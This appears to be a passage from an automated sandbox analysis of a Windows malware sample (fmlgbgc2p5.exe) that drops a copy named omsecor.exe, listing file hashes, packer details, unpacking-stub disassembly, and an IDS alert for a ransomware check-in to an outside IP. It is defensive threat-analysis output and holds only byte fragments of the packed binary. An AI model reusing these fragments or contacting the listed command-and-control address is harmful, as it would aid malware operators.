                        SSDEEP:96:5V8+pYpFvE+y+oihw4TeL00GSI1jt2i73C3VIFgP/xjOiiTS2exsfqIMSrdR6wry:8+yIjg//2OGPpS/S2pxdR50yLNfRU
                        MD5:CAE2AD10B221E4FCDD4BACA0E9CB0D86
                        SHA1:3C84466CEFB5EC7115B8A0CB032B11026CED1E5E
                        SHA-256:33D121E8BA747D215562B0216594C39AD2537ABFE4C597CE67599075671E3C45
                        SHA-512:DCC65CC8170E797AD48F108F0AE7248376FBB5DA9FA6132E457A687CB2E0C2B3A2D5DEF94C246A0C6286CA15F9CC4C8CDEB54550A51F2C3FA22ADCD6A0E20C69
                        Malicious:false
                        Process:C:\Windows\SysWOW64\WerFault.exe
                        File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                        Category:dropped
                        Size (bytes):8312
                        Entropy (8bit):3.698631883261777
                        Encrypted:false
                        SSDEEP:192:R6l7wVeJNMh6NN6YNvSUBRgmfX4u6pr189bJxsf0AFDm:R6lXJ6h6n6YlSUBRgmfX4utJqfQ
                        MD5:6223873DE036A592F4A739334EA21F7F
                        SHA1:A00CD06C2F54A32067E684D13CFFA0917D21DED1
                        SHA-256:0C864FBA11CC671F591332C93E8306E31B5EACC7973237DF593AA63B5B84BB26
                        SHA-512:F8AEE7C13077D1D7C670ED3B41F85D7D9C1B570A9D2EE9E65ECD38D03DD27A2E7D6AA94BBD0100C5115AA07D2B3B6C45325DAC7D64E59FD3628DD1F0DD89A794
                        Malicious:false
                        Process:C:\Windows\SysWOW64\WerFault.exe
                        File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                        Category:dropped
                        Size (bytes):4663
                        Entropy (8bit):4.473035251656683
                        Encrypted:false
                        SSDEEP:48:cvIwWl8zsZ1Jg77aI9ZuWpW8VYFYm8M4JoaqFMP+q86g1GTFHWd:uIjftI7PP7VBJJ7PrOGTFHWd
                        MD5:095057EFDE8D4F6FB72250D550230127
                        SHA1:A9D9161DCE9695D9D731E1CC714BDEE59CD03B3F
                        SHA-256:B69F136BC21DF1CD188B04E8071D099F936806462451D995B021D8FBE051EFD2
                        SHA-512:46D5DCCED3C19BCB37E0CD76B5BD7AE72C12607BFE0FCF6355FFFFA84390BAB206D66D76DC448BA1772C9CB988F4ED95A8E70F3416124F67BCFA7EDE1551D31B
                        Malicious:false
                        Process:C:\Windows\SysWOW64\WerFault.exe
                        File Type:Mini DuMP crash report, 14 streams, Thu Dec 5 17:09:17 2024, 0x1205a4 type
                        Category:dropped
                        Size (bytes):34062
                        Entropy (8bit):2.0140100065722737
                        Encrypted:false
                        SSDEEP:96:5E8XaOwyCyQgKcF9R0xyVBUi73O3xE3PgWdt+GdrMRjReCp00zgLEQrgWIkWItIW:tFRK9MUOn4Wf+G1MbeCoLvU1AxeeyiV
                        MD5:00D618251435742CD191915D966BFFCC
                        SHA1:C2D252DCC93FFEEC519D57597DB855820A7207D8
                        SHA-256:8E3A6F593C0B571E25DEB789405D2BD7B50D6BC344A3DCD6096FF5966C720900
                        SHA-512:9D853A526C9136C35B73B80DAFFB405662D0703C71E547223D1C169424E1417EB028D43C2BF51930BA89A59D3AF6E0B4848E9509174465B2A9EBD9A49131018A
                        Malicious:false
                        Process:C:\Windows\SysWOW64\WerFault.exe
                        File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                        Category:dropped
                        Size (bytes):8240
                        Entropy (8bit):3.693030622239775
                        Encrypted:false
                        SSDEEP:192:R6l7wVeJRN6P6YTD6CgmfV4u6prZ89bOqsfZ4am:R6lXJ76P6Y36CgmfV4u5OJfZk
                        MD5:2D05211D3AC21540DE98F6B47A0053E6
                        SHA1:C9FEF9558EF538A9939B01E83055E761112380BC
                        SHA-256:090C872755DEAC4646BBAFF5877E99E431437C04F96BD5184C7925123199C11F
                        SHA-512:9935CC73716F105A704ACE4D6A43BAC1737493B53DA39D2F15AC012B0DE906D34EA64FEB2E8DE18CCDD96290693F9BCB86A94BD09007049C10A6260014C33F10
                        Malicious:false
                        Process:C:\Windows\SysWOW64\WerFault.exe
                        File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                        Category:dropped
                        Size (bytes):4648
                        Entropy (8bit):4.466000007255134
                        Encrypted:false
                        SSDEEP:48:cvIwWl8zsZ1Jg77aI9ZuWpW8VYvYm8M4J9aqFBU+q8QgqAT7vKd:uIjftI7PP7VfJ0+U3+T7vKd
                        MD5:4BE4CD31848E9FF2C41FD41E84DF6B44
                        SHA1:189CB891C1AF3A10FE8638783F4E86763AE84FF1
                        SHA-256:019EA4FBBCB6C5816CF7536AB596D165805C9FC785630872411B81915335F3F4
                        SHA-512:14B626BB53830BE6AA9AF70BA309741046CC91DBC49A7C861079B33C514AA91456CA6B16D84EF46515794F792736457AE33985731A103F0CB1A15FAFA6BB1356
                        Malicious:false
                        Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="618251" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409
                        Process:C:\Windows\SysWOW64\WerFault.exe
                        File Type:Mini DuMP crash report, 14 streams, Thu Dec 5 17:10:58 2024, 0x1205a4 type
                        Category:dropped
                        Size (bytes):33646
                        Entropy (8bit):2.0093032600406406
                        Encrypted:false
                        SSDEEP:96:5b8jQWEMJSU+TTMHCUdEmKgUi7DW3NID3llPRS6eL1woq7sxIw9EESy9lnLEwrom:CFbOCC0UO31xRSJxdqcSanLvhcflQmE
                        MD5:60A914B23999FEC63F46F66260BF8775
                        SHA1:9A05D360661DFCCB351B2E42C20CB45181C33459
                        SHA-256:2BB0A9E4BC344731FCF21A95BA9419AF3F3D8BEE36F5D06D5F861C9D6ABA5C98
                        SHA-512:9CA85794926BC5C36E051BD2CC004017ED2F3F93A26627F47DA447FBA8129123A4EE0D1B328C1146DACCCD9710D719AE05414ED739FA4E864791C5CBA96F6D4E
                        Malicious:false
                        Preview:MDMP..a..... .........Qg....................................................T.......8...........T................x......................t...............................................................................eJ..............GenuineIntel............T.............Qg.............................0..2...........,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6...................................................................................................................................................................................................................................................................................................................................................................................................................................................
                        Process:C:\Windows\SysWOW64\WerFault.exe
                        File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                        Category:dropped
                        Size (bytes):6280
                        Entropy (8bit):3.7176047442631237
                        Encrypted:false
                        SSDEEP:96:RSIU6o7wVetbk86sYy4x0QE/vv+5aM4Ut89bPiGsfHPF9Qm:R6l7wVeJk86sYy4u6prt89baGsfHPFem
                        MD5:D23C9AFC661494229A12E14AF0600BE7
                        SHA1:BC5728D4E28A9D3E48AEA4390CFD3B96AA9FBEF0
                        SHA-256:A0FD37CB915E6FE1F01420AD54660D9FFDCC7B1E2614B1B4E3C7B48366E3C1FC
                        SHA-512:7B2F36CABDDD045A44654A937D4692449214AD04DAD5597AE2C2C6FDFE7ACA037CABBF18A9AD5EA136BBB1B892F181591F8F34859C6965D81920879CF0DDD19D
                        Malicious:false
                        Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.7.4.4.0.<./.P.i.
                        Process:C:\Windows\SysWOW64\WerFault.exe
                        File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                        Category:dropped
                        Size (bytes):4648
                        Entropy (8bit):4.467607127820123
                        Encrypted:false
                        SSDEEP:48:cvIwWl8zsZTJg77aI9ZuWpW8VYJYm8M4JqaqFbRR+q8dgZr3Ty2Q7d:uIjfPI7PP7VNJfuRqgr3TXQ7d
                        MD5:3557525D78415BDA9D074046651F5F19
                        SHA1:822C4FA673F3BB18043EFCA3E44A1D9E06352DC7
                        SHA-256:3FB2D411673B1909DFF07897274578507FCF850F027808D8A7A807B8552BC13C
                        SHA-512:2DD7B92822307920F410CABE06B294EBF13CD6BB5FCDD4ABE6C5DB12EE1143975E43AC548510E9C25215C69AF1CCB12B50D7D170F559BC38DD7EC1A73298674E
                        Malicious:false
                        Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="618253" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409
                        Process:C:\Windows\SysWOW64\WerFault.exe
                        File Type:Mini DuMP crash report, 14 streams, Thu Dec 5 17:10:59 2024, 0x1205a4 type
                        Category:dropped
                        Size (bytes):33646
                        Entropy (8bit):2.003934772264745
                        Encrypted:false
                        SSDEEP:192:blCCm1UOWJisCdLlLKSit93qGJ2WnSxk6:lG2CplLKN93B2WSH
                        MD5:1662551753AA4FBF8CCA921AA99DDEC6
                        SHA1:7A0BD1C0E10A08EF35E335272B3BAD6607FC8242
                        SHA-256:6FB367FCA5320A1F4306511FC6F218A0B41A395AE45C6462F31CCF470CF7A704
                        SHA-512:D2540307D9E181F3B5F2C9D49830AB512DDDC0F5E06F776227E7F90E419741A138648F5A6DD0CAD12AA8E4A80AC5CA0CAB261F85A17531BF6FDCEC71D9565997
                        Malicious:false
                        Preview:MDMP..a..... .........Qg....................................................T.......8...........T................x......................t...............................................................................eJ..............GenuineIntel............T.............Qg.............................0..2...........,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6...................................................................................................................................................................................................................................................................................................................................................................................................................................................
                        Process:C:\Windows\SysWOW64\WerFault.exe
                        File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                        Category:dropped
                        Size (bytes):8240
                        Entropy (8bit):3.6915008095433524
                        Encrypted:false
                        SSDEEP:192:R6l7wVeJpj1666Yve6YgmfV4u6prl89bj1sf2hm:R6lXJ91666YW6YgmfV4u9jOfh
                        MD5:F657AC0EB7FCE737FF2431ED50B92C50
                        SHA1:5CA300860D611CE36AAF05C1DF7312C1972D1224
                        SHA-256:9D5BB72DE7236A5ED285EB31F170E81FE2245065B25406E138215406893E541E
                        SHA-512:22082C54608E159AA663C3B191C27703BFC909366ED3D0AB2010D28D735E5F9EDA3923748B18DFDBCE8776299C756814ED48C6F3AB3C8724899979FB41841027
                        Malicious:false
                        Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.7.6.1.2.<./.P.i.
                        Process:C:\Windows\SysWOW64\WerFault.exe
                        File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                        Category:dropped
                        Size (bytes):4648
                        Entropy (8bit):4.468279794774689
                        Encrypted:false
                        SSDEEP:48:cvIwWl8zsZTJg77aI9ZuWpW8VYQYm8M4JVaqFf+q8Yg2T7KDwMjd:uIjfPI7PP7VoJcAP7T7KLjd
                        MD5:D5476DFA2D2E4D3F53CF80DFAED2F2B5
                        SHA1:D0A0FD4C9F53AE84D96AF1B296CA1E57B343F7CD
                        SHA-256:0821F79771B64C3FC57B531CD7F1730B30FCB3DE4D0836502955DB355069586F
                        SHA-512:6564C03A3F11E3784D579EDFCBE4C417E541FC26531CB3D23DF84245255C4A5F582C4BB692258DFAE7EEB712D9415C048E759902DCCCB6219DC1788F4FCC4DFC
                        Malicious:false
                        Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="618253" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409
                        Process:C:\Users\user\Desktop\fmlgbgc2p5.exe
                        File Type:MS-DOS executable PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, MZ for MS-DOS
                        Category:dropped
                        Size (bytes):98330
                        Entropy (8bit):7.9596512885560085
                        Encrypted:false
                        SSDEEP:1536:snAHcBbLmdvduLd8IDiaP/8A68YaiIv2RwEYqlwi+BzdAeV9b5ADbyxxq:sGs8cd8eXlYairZYqMddH13q
                        MD5:50E482AEFE2A49BBCB4AAEE1B8C70305
                        SHA1:10BCE9FBE4CF53152A0CC551A077C50D3F2500BE
                        SHA-256:8348D70C59B9EBE0DC19E35CDB4176E5825BD691BD1DC1EA6A0FE8EAAB0A5384
                        SHA-512:E1F609BBD66C06830A47F075E8D17EECDB0D6E816CB451E7F88EB00982D8E7B6955FA52EB6BFC7DD11A57EC798646EF9A8B17EA350FDD91CC791FCA5FFFA1E4B
                        Malicious:true
                        Antivirus:
                        • Antivirus: Avira, Detection: 100%
                        • Antivirus: Joe Sandbox ML, Detection: 100%
                        Preview:MZ@.....................................!..L.!Win32 .EXE...$@...PE..L.../s.P.................p........................@..........................0................... ................................... ..............................................................................<................................MPRESS1.........h.......................MPRESS2.............j...................rsrc........ .......x..............@..............................................................................v2.19 ..g.....E..`.Y.....A.f.7bw. <..k,/...".gD(.t.2...0.!A..J.W.6.W.%h1(............j..U...S.....A..y..& a..h!b.....+h.pV..h..9......X<.K1...^[.D.&...l..p/..\ .{...L..}....).;3l.:33.v..5.sH.....[r&.I......l...[..>.m....<......x...1.q..}.&...R~.rz1..5k.....A...jc..a.6.......r@...n7D/k...(3..?J.a.JK...f....Q.....Lk..z.V...J....Z6...D.o........O....v{...8e....'....W?6}.......8.....CX....9.H..o.h6.y...Z..z!..E#.(..5.....l.h.Y....j t...t._=..&...@y..`.7..^].#no<:4.!
                        Process:C:\Users\user\AppData\Roaming\omsecor.exe
                        File Type:MS-DOS executable PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, MZ for MS-DOS
                        Category:dropped
                        Size (bytes):98330
                        Entropy (8bit):7.959652331914838
                        Encrypted:false
                        SSDEEP:1536:rnAHcBbLmdvduLd8IDiaP/8A68YaiIv2RwEYqlwi+BzdAeV9b5ADbyxxq:rGs8cd8eXlYairZYqMddH13q
                        MD5:75B0F2A9AD432A0DBC138A050D744956
                        SHA1:22D02018102A34D608F7A7B567B0B059DD03931E
                        SHA-256:805C565C436AA64C736BA52D4C1F4B8CB4CE573C76A3774B97FCD6CAC9618039
                        SHA-512:F4A02400B44ED5C5058F46AFA70905962B83CA5E02C92105313381B9ADF6B091F7E612FB15ABA0994DF41F38BCFE5CD6138F34C7C8FF17AF35EC292C48215701
                        Malicious:true
                        Antivirus:
                        • Antivirus: Avira, Detection: 100%
                        • Antivirus: Joe Sandbox ML, Detection: 100%
                        Preview:MZ@.....................................!..L.!Win32 .EXE...$@...PE..L....t.P.................p........................@..........................0................... ................................... ..............................................................................<................................MPRESS1.........h.......................MPRESS2.............j...................rsrc........ .......x..............@..............................................................................v2.19 ..g.....E..`.Y.....A.f.7bw. <..k,/...".gD(.t.2...0.!A..J.W.6.W.%h1(............j..U...S.....A..y..& a..h!b.....+h.pV..h..9......X<.K1...^[.D.&...l..p/..\ .{...L..}....).;3l.:33.v..5.sH.....[r&.I......l...[..>.m....<......x...1.q..}.&...R~.rz1..5k.....A...jc..a.6.......r@...n7D/k...(3..?J.a.JK...f....Q.....Lk..z.V...J....Z6...D.o........O....v{...8e....'....W?6}.......8.....CX....9.H..o.h6.y...Z..z!..E#.(..5.....l.h.Y....j t...t._=..&...@y..`.7..^].#no<:4.!
                        Process:C:\Windows\SysWOW64\WerFault.exe
                        File Type:MS Windows registry file, NT/2000 or above
                        Category:dropped
                        Size (bytes):1835008
                        Entropy (8bit):4.4229033757993115
                        Encrypted:false
                        SSDEEP:6144:4cifpi6ceLPL9skLmb0mSSWSPtaJG8nAgex285i2MMhA20X4WABlGuNe5+Koo:ti58SSWIZBk2MM6AFBsoKoo
                        MD5:FC2977C1E361D75035216477A5A62FCA
                        SHA1:21604D0A222BF32162CF9513ED64421F1F298532
                        SHA-256:A68D6763B8BC4E7F2F9BCB6ECF5CD8086780109FB64ABBC956318397C823FD5A
                        SHA-512:BB9723833F677C248499D120E0CE90E830913A6C41887695AD75267A6B693E79521EDEB02947A294FDA9D7241F9DAD569BC6320EBC658051675B2CEE12FA3156
                        Malicious:false
                        Preview:regfG...G....\.Z.................... ...........\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e....c...b...#.......c...b...#...........c...b...#......rmtm..Tj8G..............................................................................................................................................................................................................................................................................................................................................d.C^........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                        File type:MS-DOS executable PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, MZ for MS-DOS
                        Entropy (8bit):7.9596555927736325
                        TrID:
                        • Win32 Executable (generic) a (10002005/4) 99.96%
                        • Generic Win/DOS Executable (2004/3) 0.02%
                        • DOS Executable Generic (2002/1) 0.02%
                        • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                        File name:fmlgbgc2p5.exe
                        File size:98'330 bytes
                        MD5:809d8bedb2da450b588bf82e9a118fe4
                        SHA1:5cb2c9863ddc2ba5346967bf0780554c8dc120f9
                        SHA256:8b0613982b6a7f0542a7dbfce43aa216a043ce9a2a2a24a7a2c77a6e8fa6aa72
                        SHA512:4768075e7c02683f09e9d23339b5a69724c3439c711244c7761f9ceaf44f7c4a6d8b1189ab47214e4aa4a27e1fad1f07b4be4d3d374c87326611fc68be378287
                        SSDEEP:1536:hnAHcBbLmdvduLd8IDiaP/8A68YaiIv2RwEYqlwi+BzdAeV9b5ADbyxxq:hGs8cd8eXlYairZYqMddH13q
                        TLSH:95A302CAC93DE0D9F0F9593945AFE54732BCEC17A198173B8BD8256CBD885D80A110F9
                        File Content Preview:MZ@.....................................!..L.!Win32 .EXE...$@...PE..L....y.P.................p........................@..........................0................... ................................... .....................................................
                        Icon Hash:0305820181422513
                        Entrypoint:0x4210a8
                        Entrypoint Section:.MPRESS2
                        Digitally signed:false
                        Imagebase:0x400000
                        Subsystem:windows gui
                        Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE, DEBUG_STRIPPED
                        DLL Characteristics:
                        Time Stamp:0x50AF79C4 [Fri Nov 23 13:27:32 2012 UTC]
                        TLS Callbacks:
                        CLR (.Net) Version:
                        OS Version Major:4
                        OS Version Minor:0
                        File Version Major:4
                        File Version Minor:0
                        Subsystem Version Major:4
                        Subsystem Version Minor:0
                        Import Hash:850bf254c76e5c8effedc1f08eb6c411
                        Instruction
                        pushad
                        call 00007F163D54D525h
                        pop eax
                        add eax, 00000B5Ah
                        mov esi, dword ptr [eax]
                        add esi, eax
                        sub eax, eax
                        mov edi, esi
                        lodsw
                        shl eax, 0Ch
                        mov ecx, eax
                        push eax
                        lodsd
                        sub ecx, eax
                        add esi, ecx
                        mov ecx, eax
                        push edi
                        push ecx
                        dec ecx
                        mov al, byte ptr [ecx+edi+06h]
                        mov byte ptr [ecx+esi], al
                        jne 00007F163D54D518h
                        sub eax, eax
                        lodsb
                        mov ecx, eax
                        and cl, FFFFFFF0h
                        and al, 0Fh
                        shl ecx, 0Ch
                        mov ch, al
                        lodsb
                        or ecx, eax
                        push ecx
                        add cl, ch
                        mov ebp, FFFFFD00h
                        shl ebp, cl
                        pop ecx
                        pop eax
                        mov ebx, esp
                        lea esp, dword ptr [esp+ebp*2-00000E70h]
                        push ecx
                        sub ecx, ecx
                        push ecx
                        push ecx
                        mov ecx, esp
                        push ecx
                        mov dx, word ptr [edi]
                        shl edx, 0Ch
                        push edx
                        push edi
                        add ecx, 04h
                        push ecx
                        push eax
                        add ecx, 04h
                        push esi
                        push ecx
                        call 00007F163D54D583h
                        mov esp, ebx
                        pop esi
                        pop edx
                        sub eax, eax
                        mov dword ptr [edx+esi], eax
                        mov ah, 10h
                        sub edx, eax
                        sub ecx, ecx
                        cmp ecx, edx
                        jnc 00007F163D54D548h
                        mov ebx, ecx
                        lodsb
                        inc ecx
                        and al, FEh
                        cmp al, E8h
                        jne 00007F163D54D514h
                        inc ebx
                        add ecx, 04h
                        lodsd
                        or eax, eax
                        js 00007F163D54D528h
                        cmp eax, edx
                        jnc 00007F163D54D507h
                        jmp 00007F163D54D528h
                        add eax, ebx
                        js 00007F163D54D501h
                        add eax, edx
                        sub eax, ebx
                        mov dword ptr [esi-04h], eax
                        jmp 00007F163D54D4F8h
                        call 00007F163D54D525h
                        pop edi
                        add edi, FFFFFF4Dh
                        mov al, E9h
                        stosb
                        mov eax, 00000B56h
                        stosd
                        call 00007F163D54D525h
                        Name | Virtual Address | Virtual Size | Is in Section
                        IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
                        IMAGE_DIRECTORY_ENTRY_IMPORT | 0x21000 | 0xa8 | .MPRESS2
                        IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x22000 | 0x798 | .rsrc
                        IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
                        IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
                        IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x0 | 0x0 |
                        IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
                        IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
                        IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
                        IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
                        IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
                        IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
                        IMAGE_DIRECTORY_ENTRY_IAT | 0x2103c | 0x10 | .MPRESS2
                        IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
                        IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
                        IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
                        Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
                        .MPRESS1 | 0x1000 | 0x20000 | 0x16800 | 3c05710d8e0f8b2c4b5195d41c97543d | False | 1.000390625 | data | 7.998409371053569 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                        .MPRESS2 | 0x21000 | 0xc12 | 0xe00 | 58ed9b290702b61b25d57f2eb0e1ef56 | False | 0.5131138392857143 | data | 6.0539393201204925 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                        .rsrc | 0x22000 | 0x798 | 0x800 | 08f85d44ed88a96e513482027c080e7c | False | 0.34375 | data | 3.22496295890587 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                        Name | RVA | Size | Type | Language | Country | ZLIB Complexity
                        RT_BITMAP | 0xd1c0 | 0x131fc | data | English | United States | 1.0004934210526315
                        RT_ICON | 0x220c0 | 0x2e8 | Device independent bitmap graphic, 32 x 64 x 4, image size 512, 16 important colors | English | United States | 0.19489247311827956
                        RT_STRING | 0x206a4 | 0x54 | empty | English | United States | 0
                        RT_GROUP_ICON | 0x22428 | 0x14 | data | English | United States | 1.2
                        RT_VERSION | 0x2247c | 0x284 | data | English | United States | 0.4922360248447205
                        RT_MANIFEST | 0x22740 | 0x56 | ASCII text, with CRLF line terminators | English | United States | 1.0232558139534884
                        DLL | Import
                        KERNEL32.DLL | GetModuleHandleA, GetProcAddress
                        USER32.dll | GetClassNameA
                        Language of compilation system | Country where language is spoken | Map
                        English | United States |
                        Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
                        2024-12-05T18:09:13.072527+0100 | 2015786 | ET MALWARE Ransom.Win32.Birele.gsg Checkin | 1 | 192.168.2.7 | 50001 | 193.166.255.171 | 80 | TCP
